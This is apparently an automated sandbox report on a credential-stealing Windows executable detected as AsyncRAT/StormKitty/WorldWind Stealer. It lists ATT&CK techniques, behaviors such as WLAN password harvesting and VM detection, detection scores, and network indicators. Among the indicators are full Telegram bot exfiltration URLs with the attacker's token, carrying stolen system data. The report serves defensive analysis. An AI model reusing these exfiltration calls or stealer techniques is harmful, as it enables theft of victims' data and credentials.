                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                              Windows Management Instrumentation
                              1
                              Scheduled Task/Job
                              11
                              Process Injection
                              1
                              Masquerading
                              1
                              OS Credential Dumping
                              341
                              Security Software Discovery
                              Remote Services1
                              Archive Collected Data
                              1
                              Web Service
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter
                              1
                              DLL Side-Loading
                              1
                              Scheduled Task/Job
                              11
                              Disable or Modify Tools
                              LSASS Memory1
                              Process Discovery
                              Remote Desktop Protocol2
                              Data from Local System
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              Logon Script (Windows)1
                              DLL Side-Loading
                              251
                              Virtualization/Sandbox Evasion
                              Security Account Manager251
                              Virtualization/Sandbox Evasion
                              SMB/Windows Admin SharesData from Network Shared Drive3
                              Ingress Tool Transfer
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                              Process Injection
                              NTDS1
                              Application Window Discovery
                              Distributed Component Object ModelInput Capture3
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                              Obfuscated Files or Information
                              LSA Secrets1
                              System Network Configuration Discovery
                              SSHKeylogging4
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials2
                              File and Directory Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync134
                              System Information Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588314 Sample: cOH7jKmo25.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 31 api.telegram.org 2->31 33 158.157.4.0.in-addr.arpa 2->33 35 2 other IPs or domains 2->35 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 51 11 other signatures 2->51 8 cOH7jKmo25.exe 15 158 2->8         started        signatures3 49 Uses the Telegram API (likely for C&C communication) 31->49 process4 dnsIp5 37 127.0.0.1 unknown unknown 8->37 39 api.telegram.org 149.154.167.220, 443, 49796, 49806 TELEGRAMRU United Kingdom 8->39 41 2 other IPs or domains 8->41 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->53 55 Found many strings related to Crypto-Wallets (likely being stolen) 8->55 57 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->57 59 2 other signatures 8->59 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        signatures6 process7 signatures8 61 Uses netsh to modify the Windows network and firewall settings 12->61 63 Tries to harvest and steal WLAN passwords 12->63 17 netsh.exe 2 12->17         started        19 conhost.exe 12->19         started        21 findstr.exe 1 12->21         started        23 chcp.com 1 12->23         started        25 netsh.exe 2 15->25         started        27 conhost.exe 15->27         started        29 chcp.com 1 15->29         started        process9

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              cOH7jKmo25.exe92%ReversingLabsByteCode-MSIL.Backdoor.AsyncRat
                              cOH7jKmo25.exe81%VirustotalBrowse
                              cOH7jKmo25.exe100%Joe Sandbox ML
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              https://api.tele0%Avira URL Cloudsafe
                              http://icanhazip.comd0%Avira URL Cloudsafe
                              https://api.telegram.orgd0%Avira URL Cloudsafe
                              http://api.mylnikov.orgd0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              api.mylnikov.org
                              104.21.44.66
                              truefalse
                                high
                                api.telegram.org
                                149.154.167.220
                                truefalse
                                  high
                                  icanhazip.com
                                  104.16.184.241
                                  truefalse
                                    high
                                    158.157.4.0.in-addr.arpa
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                                        high
                                        https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-10%205:53:38%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20302494%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20282H_%0ARAM:%204095MB%0AHWID:%20C344724773%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=Truefalse
                                          high
                                          http://icanhazip.com/false
                                            high
                                            https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders...false
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabtmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                high
                                                https://duckduckgo.com/ac/?q=tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                  high
                                                  https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13cOH7jKmo25.exefalse
                                                    high
                                                    https://api.telegram.orgcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                        high
                                                        https://api.telegram.org/botcOH7jKmo25.exefalse
                                                          high
                                                          https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=52871cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                  high
                                                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15dcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                      high
                                                                      http://icanhazip.comdcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpA839.tmp.dat.0.drfalse
                                                                        high
                                                                        http://icanhazip.com/tcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                            high
                                                                            https://api.mylnikov.org/geolocation/wifi?v=1.1&cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessagecOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/LimerBoy/StormKittycOH7jKmo25.exefalse
                                                                                  high
                                                                                  https://api.telecOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                                    high
                                                                                    https://api.mylnikov.orgcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002E8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5tmpA839.tmp.dat.0.drfalse
                                                                                        high
                                                                                        https://github.com/LimerBoy/StormKitty0&cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://api.telegram.orgdcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://api.telegram.orgdcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://icanhazip.comcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://support.mozilla.orgtmpA839.tmp.dat.0.drfalse
                                                                                                high
                                                                                                http://api.mylnikov.orgdcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://api.telegram.org/file/botcOH7jKmo25.exefalse
                                                                                                  high
                                                                                                  http://api.telegram.orgcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, cOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/LimerBoy/StormKittyTCcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002D7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://api.mylnikov.orgcOH7jKmo25.exe, 00000000.00000002.2566383997.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpA739.tmp.dat.0.dr, tmpA6E7.tmp.dat.0.drfalse
                                                                                                            high
                                                                                                            https://pastebin.com/raw/7B75u64BcOH7jKmo25.exefalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              104.21.44.66
                                                                                                              api.mylnikov.orgUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              149.154.167.220
                                                                                                              api.telegram.orgUnited Kingdom
                                                                                                              62041TELEGRAMRUfalse
                                                                                                              104.16.184.241
                                                                                                              icanhazip.comUnited States
                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                              IP
                                                                                                              127.0.0.1
                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                              Analysis ID:1588314
                                                                                                              Start date and time:2025-01-10 23:52:45 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 5m 25s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:16
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:cOH7jKmo25.exe
                                                                                                              renamed because original name is a hash value
                                                                                                              Original Sample Name:153a321e178bc28e0f2c6432763bb44fc47b573596387ec241ca45d8775e12af.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@17/114@4/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 121
                                                                                                              • Number of non-executed functions: 10
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe
                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              TimeTypeDescription
                                                                                                              17:53:48API Interceptor1966373x Sleep call for process: cOH7jKmo25.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              104.21.44.66FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                  client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                    WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
                                                                                                                      PasteHook.exeGet hashmaliciousAsyncRAT, DCRat, StormKitty, WorldWind Stealer, XmrigBrowse
                                                                                                                        viVOqZjAT0.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                          Kh7W85ONS7.exeGet hashmaliciousAsyncRAT, DarkTortilla, StormKitty, WorldWind StealerBrowse
                                                                                                                            zrrHgsDzgS.exeGet hashmaliciousAsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRATBrowse
                                                                                                                              H1XdsfkcgU.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exeGet hashmaliciousAsyncRAT, DcRat, StormKitty, VenomRATBrowse
                                                                                                                                  149.154.167.2203i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                            6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                  4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                    Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      104.16.184.241FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • icanhazip.com/
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      api.mylnikov.orgFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 104.21.44.66
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      VzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      d29z3fwo37.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      BTC.exeGet hashmaliciousAsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWormBrowse
                                                                                                                                                      • 172.67.196.114
                                                                                                                                                      client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 104.21.44.66
                                                                                                                                                      icanhazip.comFUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 104.16.185.241
                                                                                                                                                      bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                      • 104.16.185.241
                                                                                                                                                      Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.16.184.241
                                                                                                                                                      CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                                      • 104.16.185.241
                                                                                                                                                      api.telegram.org3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      TELEGRAMRU3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 149.154.167.220
                                                                                                                                                      CLOUDFLARENETUS3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.32.1
                                                                                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.48.1
                                                                                                                                                      vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 188.114.96.3
                                                                                                                                                      xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 104.26.12.205
                                                                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
                                                                                                                                                      Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.162.153
                                                                                                                                                      CLOUDFLARENETUS3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.16.1
                                                                                                                                                      2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.32.1
                                                                                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                      • 104.21.48.1
                                                                                                                                                      vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 188.114.96.3
                                                                                                                                                      xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                      • 104.26.12.205
                                                                                                                                                      czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                      • 104.21.112.1
                                                                                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                      • 104.21.96.1
